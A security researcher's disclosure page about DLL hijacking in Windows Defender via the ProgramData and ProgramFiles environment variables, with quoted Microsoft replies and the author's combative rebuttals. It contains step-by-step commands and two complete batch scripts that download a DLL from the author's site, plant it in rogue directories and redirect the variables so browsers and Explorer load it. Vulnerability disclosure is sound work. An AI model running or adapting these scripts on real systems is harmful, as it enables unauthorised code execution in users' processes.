
Me, myself & IT

Vulnerabilities introduced by Windows® Defender

Purpose
Reason
Case 1
Demonstration
Batch Script
Vendor Statement
Case 2
Demonstration
Batch Script
Vendor Statement
Background Information
Case 3
Demonstration
Batch Script
Mitigation

Purpose

Demonstrate vulnerabilities introduced by Windows Defender and the anti-malware interfaces of Microsoft® Windows NT.
Also show that the tamper protection announced in the MSKB articles 2769299 and 4490103, and described in more detail by Protect security settings with tamper protection, is a bad joke, while its documentation tells a blatant lie:
With tamper protection, malicious apps are prevented from taking actions like these:

Reason

Windows Defender and the anti-malware interfaces implemented in Windows, like almost all so-called security software, don’t increase the safety and security of the operating system but decrease it instead, and allow attacks to be launched in the first place!

As shown hereafter, it is not even able to protect itself, despite the highlighted claim from its documentation.

Case 1

In September 2017, Microsoft published the update 4052623 for Windows 10 which relocates many executable files of Windows Defender from the directories %ProgramFiles%\Windows Defender\ and %ProgramFiles(x86)%\Windows Defender\ to %ProgramData%\Microsoft\Windows Defender\platform\‹version›\, violating the minimum requirements of their own Designed for Windows specification.

Note: I wish that somebody working for Microsoft were capable of understanding the English language and teaching developers the difference between program files and (program) data as well as (application) data!

Ever since this braindead move, the registered pathnames of the COM classes provided by Windows Defender reference the environment variable ProgramData:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}]
@="Defender CSP"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\DefenderCSP.dll\""
"ThreadingModel"="Free"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\MpOav.dll\""
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}]
@="Windows Defender WMI Provider"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\ProtectionManagement.dll\""
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

Note: the double quotes around the DLL pathnames are superfluous, and another indicator of Microsoft’s sloppy development process and the missing quality assurance!

Of special interest here is the implementation of the IOfficeAntiVirus COM interface, documented in the MSKB article Microsoft Windows Defender helps provide real-time protection.

This COM interface, introduced with Windows 2000 and Internet Explorer 5, is (for example) called by the Attachment Manager introduced with Windows XP SP2 and Internet Explorer 6 SP2.

The Attachment Manager is in turn called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page, an email or an attachment, and by File Explorer when such a file (which carries the Mark of the Web, i.e. an NTFS Alternate Data Stream named Zone.Identifier) is to be opened or executed.

Thanks to the (user-controlled) environment variable ProgramData specified in the registered pathname "%ProgramData%\Microsoft\Windows Defender\platform\‹version›\MpOav.dll" an (unprivileged) attacker can provide an arbitrary (rogue or malicious) DLL which is then loaded and executed by WWW browsers, mail and news clients, instant messengers and File Explorer whenever the user stores or opens a downloaded file, a WWW page or an attachment.

Note: this well-known weakness is documented as CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC.

Demonstration

On a 32-bit (I386 alias x86) or 64-bit (AMD64 alias x64) installation of Windows 10 with the anti-malware platform update 4052623 installed perform the following 10 (plus 1) simple steps.
  1. Log on to an arbitrary (unprivileged) user account and start the Command Processor %ComSpec% alias %SystemRoot%\System32\CMD.EXE.

  2. Download the portable executable file SENTINEL.EXE of the Vulnerability and Exploit Detector and save it in your Downloads directory %USERPROFILE%\Downloads\:

    START https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
    Note: the downloaded file gets the Mark of the Web!
  3. Download the cabinet archive SENTINEL.CAB of the Vulnerability and Exploit Detector and save it in your Temp directory %TMP%\, then extract the SENTINEL.DLL for both processor architectures (32-bit: I386; 64-bit: AMD64) into your Temp directory %TMP%\:

    BITSADMIN.EXE /TRANSFER Sentinel /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
    EXPAND.EXE "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
    Microsoft (R) File Expansion Utility  Version 10.0.11001.16384
    Copyright (C) Microsoft Corporation. All rights reserved.
    
    Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue
    
    Expanding Files ....
    
    Expanding Files Complete ...
    7 files total.
  4. Determine the registered pathname of MPOAV.DLL:

    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32" /VE
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32
        (Default)    REG_EXPAND_SZ    "%ProgramData%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
  5. Choose an arbitrary directory where you can create subdirectories, for example your user profile %USERPROFILE%\, the root directory of Windows’ system drive %SystemDrive%\, or even a (remote) network share like %LOGONSERVER%\Users\Public\, then create the subdirectories Microsoft\, Windows Defender\, Platform\ and ‹version›\ displayed in the previous step 4. below it:

    MKDIR "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0"
  6. Copy the SENTINEL.DLL that matches the bitness of your system as MPOAV.DLL into the directory ‹version› created in the previous step 5.:

    COPY "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
    on 32-bit (I386 alias x86) installations, and
    COPY "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
    on 64-bit (AMD64 alias x64) installations!
  7. Verify that you copied the appropriate SENTINEL.DLL and check its proper function:

    MSIEXEC.EXE /Z "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
  8. Set the environment variable ProgramData to the pathname of the directory used in step 5.:

    SET ProgramData=%SystemDrive%
    SETX.EXE ProgramData %SystemDrive%
  9. [Screenshot of SENTINEL.DLL called from 'Internet Explorer' via 'Attachment Manager'] Start every WWW browser available with the same bitness as your system, then download an arbitrary file and notice the message box displayed by the (replaced) %SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll called from the WWW browser and running unrestricted:

    START https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
    START IEXPLORE https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
    "%ProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
    …
  10. Start the portable executable file SENTINEL.EXE downloaded in step 2. (which got the Mark of the Web) and again notice the message box displayed by the (replaced) %SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll now called from File Explorer:

    START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
  11. Finally verify that neither the tamper protection nor the IOAV protection is disabled:

    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection"
    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
        TamperProtection    REG_DWORD    0x1
    
    ERROR: The specified registry key or value was not found.
    
    ERROR: The specified registry key or value was not found.

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows 10 with the anti-malware platform update 4052623 installed.

Rem Copyright © 2018-2020, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>

If Not Defined ProgramData Exit /B
If Not Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B

SetLocal EnableDelayedExpansion EnableExtensions
For /F "Delims== Tokens=2" %%? In ('Assoc "CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32"') Do Set OFFENDER=%%~?
If /I Not "%OFFENDER:~0,50%" == "%%ProgramData%%\Microsoft\Windows Defender\Platform\" Exit /B
If /I Not "%OFFENDER:~-10%" == "\MPOAV.dll" Exit /B
Set OFFENDER=!OFFENDER:%%ProgramData%%=%SystemDrive%!
If Exist "%OFFENDER%" Exit /B

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

MkDir "%OFFENDER:~0,-10%"
If Defined ProgramFiles(x86) Copy "%TMP%\AMD64\SENTINEL.DLL" "%OFFENDER%"
If Not Defined ProgramFiles(x86) Copy "%TMP%\I386\SENTINEL.DLL" "%OFFENDER%"
Set ProgramData=%SystemDrive%
"%SystemRoot%\System32\SetX.exe" ProgramData "%SystemDrive%"

Start https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
Start IEXPLORE https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
Exit /B

Vendor Statement

The MSRC assigned case number 57439 to the above vulnerability report and replied with the following statements:
After investigation, our engineers have determined that this behavior is by design and does not constitute a vulnerability as reported.
OUCH¹: please teach these engineers the difference between a pathname registered as %ProgramData%\…\‹filename›.‹extension› and a pathname registered as C:\ProgramData\…\‹filename›.‹extension›!

Hint: the latter does not allow loading and executing an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!

The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.

For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.

Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.

OUCH²: the attack surface of the current scenario is provided by Windows Defender itself, due to its poor implementation (see above), which allows this attack in the first place.

There is also no utility process started here: the attacker-controlled DLL is loaded and executed in the processes which want to call the AV, instead of the DLL installed with Windows Defender, thus preventing exactly the intended execution of the AV’s utility process and defeating your design!

Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.

OUCH³: there is neither a utility process nor a decoupled process involved!

The demonstration runs an arbitrary (rogue or malicious) DLL in the process of a WWW browser, a mail and news client, an instant messenger as well as the shell alias File Explorer, with the credentials of the current user, unrestricted.

As such, we are closing this case.

That said, I conclude you are neither interested in trustworthy computing nor the safety and security of your customers!

Case 2

Microsoft still registers lots of DLLs (which implement COM classes, cryptography service providers, services, etc.) as well as command lines with paths containing the (pre-defined) environment variables windir, SystemRoot, ProgramFiles, CommonProgramFiles, ProgramFiles(x86) and CommonProgramFiles(x86).

Windows Defender, as shipped with Windows Vista® and newer versions of Windows, installs a COM class which implements the IOfficeAntiVirus COM interface:

REGEDIT4

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"%ProgramFiles%\Windows Defender\MpOav.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

This COM interface is (for example) called by the Attachment Manager, which is in turn called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page or an attachment, and by File Explorer when such a file (which carries the Mark of the Web) is to be opened or executed.

Since (user) environment variables set in a user’s profile obscure (system) environment variables with the same name set for the machine, (unprivileged) users can redirect all those paths containing environment variables and execute arbitrary (rogue or malicious) DLLs and programs instead of the intended ones!

Note: the resulting well-known weakness is documented as CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC.

Note: Microsoft Security Essentials, available for Windows XP, Windows Vista and Windows 7, does not suffer from this vulnerability!

Demonstration

On a 32-bit (I386 alias x86) or 64-bit (AMD64 alias x64) installation of Windows Vista or any newer version of Windows, except Windows 10 with the anti-malware platform update 4052623 installed, perform the following 11 (plus 1) simple steps.
  1. Log on to an arbitrary (unprivileged) user account and start the Command Processor %ComSpec% alias %SystemRoot%\System32\CMD.EXE.

  2. Download the portable executable file SENTINEL.EXE of the Vulnerability and Exploit Detector and save it in your Downloads directory %USERPROFILE%\Downloads\:

    START https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
    Note: the downloaded file gets the Mark of the Web!
  3. Create a directory Rogue Program Files\ in the root directory of Windows’ system drive, copy the directory %ProgramFiles%\Windows Defender\ with its contents into the empty new directory, then create junction reparse points to all other subdirectories of the %ProgramFiles%\ directory inside the new directory:

    MKDIR "%SystemDrive%\Rogue Program Files"
    XCOPY.EXE "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
    FOR /D %? IN ("%ProgramFiles%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files\%~nx?" "%?"
    C:\Program Files\Windows Defender\MpAsDesc.dll
    C:\Program Files\Windows Defender\MpClient.dll
    C:\Program Files\Windows Defender\MpCmdRun.exe
    C:\Program Files\Windows Defender\MpCommu.dll
    C:\Program Files\Windows Defender\MpEvMsg.dll
    C:\Program Files\Windows Defender\MpOAV.dll
    C:\Program Files\Windows Defender\MpRTP.dll
    C:\Program Files\Windows Defender\MpSvc.dll
    C:\Program Files\Windows Defender\MSASCui.exe
    C:\Program Files\Windows Defender\MsMpCom.dll
    C:\Program Files\Windows Defender\MsMpLics.dll
    C:\Program Files\Windows Defender\MsMpRes.dll
    C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui
    C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui
    C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui
    15 File(s) copied
    
    Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…
    …
    Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…
  4. On 64-bit installations, additionally create a directory Rogue Program Files (x86)\ in the root directory of Windows’ system drive, copy the directory %ProgramFiles(x86)%\Windows Defender\ with its contents into the empty new directory, then create junction reparse points to all other subdirectories of the %ProgramFiles(x86)%\ directory inside the new directory:

    MKDIR "%SystemDrive%\Rogue Program Files (x86)"
    XCOPY.EXE "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
    FOR /D %? IN ("%ProgramFiles(x86)%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files (x86)\%~nx?" "%?"
    C:\Program Files (x86)\Windows Defender\MpAsDesc.dll
    C:\Program Files (x86)\Windows Defender\MpClient.dll
    C:\Program Files (x86)\Windows Defender\MpOAV.dll
    C:\Program Files (x86)\Windows Defender\MsMpLics.dll
    C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui
    C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui
    6 File(s) copied
    
    Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…
    …
    Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…
  5. Download the cabinet archive SENTINEL.CAB of the Vulnerability and Exploit Detector and save it in your Temp directory %TMP%\, then extract the SENTINEL.DLL for both processor architectures (32-bit: I386; 64-bit: AMD64) into your Temp directory %TMP%\:

    BITSADMIN.EXE /TRANSFER Sentinel /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
    EXPAND.EXE "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
    Microsoft (R) File Expansion Utility  Version 6.1.7600.16385
    Copyright (C) Microsoft Corporation. All rights reserved.
    
    Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue
    Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue
    
    Expanding Files ....
    
    Expanding Files Complete ...
    7 files total.
  6. On 32-bit installations, copy the 32-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll:

    COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
  7. On 64-bit installations, copy the 64-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll and the 32-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll:

    COPY /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
    COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll"
  8. Save the value of the environment variable ProgramFiles, then set it to the pathname of the directory created in step 3.:

    SET RealProgramFiles=%ProgramFiles%
    SET ProgramFiles=%SystemDrive%\Rogue Program Files
    SETX.EXE ProgramFiles "%SystemDrive%\Rogue Program Files"
  9. On 64-bit installations, additionally save the value of the environment variable ProgramFiles(x86), then set it to the pathname of the directory created in step 4.:

    SET RealProgramFiles(x86)=%ProgramFiles(x86)%
    SET ProgramFiles(x86)=%SystemDrive%\Rogue Program Files (x86)
    SETX.EXE ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"
  10. Download an arbitrary file with your WWW browser, for example SENTINEL.DLL, or save an attachment in your mail client:

    START https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
    "%RealProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.homepage.t-online.de/download/SENTINEL.DLL
    "%RealProgramFiles(x86)%\Internet Explorer\IEXPLORE.EXE" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
    This loads and executes %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll and %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll, which display message boxes with information about their caller, instead of C:\Program Files\Windows Defender\MpOAV.dll and C:\Program Files (x86)\Windows Defender\MpOAV.dll!
  11. Start the portable executable file SENTINEL.EXE downloaded in step 2. (which got the Mark of the Web) and again notice the message box displayed by %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll or %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll now called from File Explorer:

    START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
  12. Finally verify that neither the tamper protection nor the IOAV protection is disabled:

    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection"
    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
    REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
        TamperProtection    REG_DWORD    0x1
    
    ERROR: The specified registry key or value was not found.
    
    ERROR: The specified registry key or value was not found.

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows Vista and newer versions of Windows.

Rem Copyright © 2009-2020, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>

Rem (KB4052623)
Rem If Defined ProgramData If Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

If Not Defined ProgramFiles Exit /B
If Not Exist "%ProgramFiles%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files" Exit /B

MkDir "%SystemDrive%\Rogue Program Files"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files\%%~nx?" "%%?"
Set RealProgramFiles=%ProgramFiles%
Set ProgramFiles=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles "%SystemDrive%\Rogue Program Files"

Start https://skanthak.homepage.t-online.de/download/SENTINEL.CAB
"%RealProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.DLL

If Not Defined ProgramFiles(x86) Exit /B
If Not Exist "%ProgramFiles(x86)%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files (x86)" Exit /B

MkDir "%SystemDrive%\Rogue Program Files (x86)"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
Copy /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles(x86)%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files (x86)\%%~nx?" "%%?"
Set RealProgramFiles(x86)=%ProgramFiles(x86)%
Set ProgramFiles(x86)=%SystemDrive%\Rogue Program Files (x86)
"%SystemRoot%\System32\SetX.exe" ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"

"%RealProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.homepage.t-online.de/download/SENTINEL.EXE
Exit /B

Vendor Statement

The MSRC assigned case number 57447 to the above vulnerability report and replied with the following statements:
This was also assessed in a similar way as the other reported case.

After investigation, our engineers have determined that this behavior is by design and does not constitute a vulnerability as reported.

OUCH¹: please teach these engineers the difference between a pathname registered as %ProgramFiles%\…\‹filename›.‹extension› and a pathname registered as C:\Program Files\…\‹filename›.‹extension›!

Hint: the latter does not allow loading and executing an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!

The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.

For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.

Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.

OUCH²: the attack surface of the current scenario is provided by Windows Defender itself, due to its poor implementation (see above), which allows this attack in the first place.

There is also no utility process started here: the attacker-controlled DLL is loaded and executed in the processes which want to call the AV, instead of the DLL installed with Windows Defender, thus preventing exactly the intended execution of the AV’s utility process and defeating your design!

Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.

OUCH³: there is neither a utility process nor a decoupled process involved!

The demonstration runs an arbitrary (rogue or malicious) DLL in the process of a WWW browser, a mail and news client, an instant messenger as well as the shell alias File Explorer, with the credentials of the current user, unrestricted.

As such, we are closing this case.

That said, I conclude you are neither interested in trustworthy computing nor the safety and security of your customers!

Background Information

Windows Vista and newer versions of Windows are shipped as (pre-built) generalised system images, designed to run from a single hard disk partition with the drive letter C assigned. All directories and files contained within these system images have fixed, language-independent (path)names and can neither be relocated nor renamed: see the MSKB articles 949977 and 2787623 for some details. Additionally the vast majority of files are (nowadays) registered with their absolute (fully qualified) pathname containing the (fixed) drive letter and the language-independent directory name, which renders their change or relocation practically impossible.

